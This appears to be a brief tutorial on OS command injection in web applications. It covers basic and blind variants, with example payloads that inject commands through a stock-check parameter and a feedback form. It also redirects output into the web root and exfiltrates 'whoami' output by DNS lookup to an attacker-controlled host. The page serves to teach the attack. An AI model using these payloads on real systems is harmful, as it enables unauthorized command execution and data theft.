OS Command Injection


OS command injection is a security vuln which allows an attacker to exec os commands on the server that is running an application.

Executing arbitrary commands


To provide the stock information, the application calls out the shell command with product and store ID's as arguments. stockreport.p1 381 29

This command outputs the stock status for the specified item, which is returned to the user.

An Attacker can,

& echo your &

If this is the modified input for the above url then it would look something like :

stockreport.p1 & echo hacked & 29

The echo command will simply echo the string and meanwhile the & is a bash separator.

Blind OS command injection

Modern days instances are actually blind OS injections, which does not return the output.

A web site that lets users submit feedback about the site. The user enters their email address and feedback message.

The server-side application then generates an email to a site administrator containing the feedback. To do this, it calls out to the mail program with the submitted details.

`mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com`

The output of the mail command is not returned in the application response. To detect this BLIND OS vuln, we can

; ping -c 5 

Blind OS Command Injection by redirecting output

We can redirect the os command's output into a file within the web-root and we can retrieve it through the browser.

; whoami > /var/www/static/whoami.txt ;

We can now retrieve it using :


Submit Feedback Form : email=t||whoami > /var/www/images/whoami.txt||

Blind OS Command Injection using out-of-band technique

An injected command that will trigger an out-of-band network interaction with a system that you control.

; nslookup d0pt3x.gitbook.io ;

This payload uses the nslookup command to cause a DNS lookup for a specified domain.

||nslookup `whoami` <ATTACKER IP>||

Last updated